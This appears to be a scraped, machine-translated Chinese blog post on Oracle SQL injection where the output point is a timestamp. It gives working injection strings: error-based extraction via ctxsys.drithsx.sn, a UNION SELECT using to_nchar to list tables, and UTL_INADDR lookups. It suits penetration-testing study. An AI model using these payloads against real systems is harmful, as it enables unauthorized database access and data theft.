当前位置:网站首页>For penetration testing methods where the output point is a timestamp (take Oracle database as an example)
For penetration testing methods where the output point is a timestamp (take Oracle database as an example)
2022-07-31 05:53:00 【not used to having you】
Note: For technical discussion only, do not use for other purposes, all consequences have nothing to do with me.
Workaround:
1. Blinds
2. Try error injection
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))
3. Try to convert type
to_nchar is converted to varchar or varchar2 type
Usage to_nchar(table_name)
and 1=2 union select null,null,to_nchar(table_name),null from user_tables
4. Convert characters to numbers through functions
Cut the string, turn the number to see the echo
Due to the word count requirement, I looked at some other error reporting functions
1.UTL_INADDR.get_host_address environment IP address
Specific usage: select UTL_INADDR.get_host_address('www.qq.com') from dual;
2.UTL_INADDR.get_host_name returns the hostname in the environment
Specific usage:
Returns the hostname of the specified IP address in the LAN
select UTL_INADDR.get_host_name('192.168.0.156') from dual;
Returns the URL of the specified IP address in intrenet
select UTL_INADDR.get_host_name('219.153.50.84') from dual;
You can view related contentOracle fault injectionFunction_Brother Xiaoming's technical blog_51CTO Blog
边栏推荐
猜你喜欢
[JVM Loading]---Class Loading Mechanism
Year-end summary - the years are quiet~
Common JVM interview questions and answers
The MySQL database in Alibaba Cloud was attacked, and the data was finally recovered
vulhub靶场学习日记xxe-lab
MySql创建数据表
闭包(五)----一个常见的循环
On the side of Ali, tell me what are the application scenarios of message middleware you know?
11 【组件通信】
Redis管道技术/分区
随机推荐
MySQL错误-this is incompatible with sql_mode=only_full_group_by完美解决方案
小白学爬虫——爬虫入门
leetcode-每日一题565. 数组嵌套(标记图和并查集)
Redis first meeting
1D, 2D, 3D convolution operations in pytorch
Xiaobai learns reptiles - introduction to reptiles
永恒之蓝漏洞复现
Getting to know regular expressions
Volatility取证工具使用日记
Error: Cannot find module ‘D:\Application\nodejs\node_modules\npm\bin\npm-cli.js‘
leetcode-每日一题剑指 Offer II 041. 滑动窗口的平均值(队列模拟)
[uiautomation] Get WeChat friend list (stored in txt)
【C语言3个基本结构详解——顺序、选择、循环】
数字孪生将成为进入“元宇宙”一项重要的途径
什么是EVM兼容链?
继承、Super,重写、抽象类、抽象方法 1(第七天)
GUCCI、LV等奢侈品巨头如何布局元宇宙的,其他品牌应该跟上吗?
Memcached :安装
了解SSRF,这一篇就足够了
【云原生】微服务Nacos的简单介绍与使用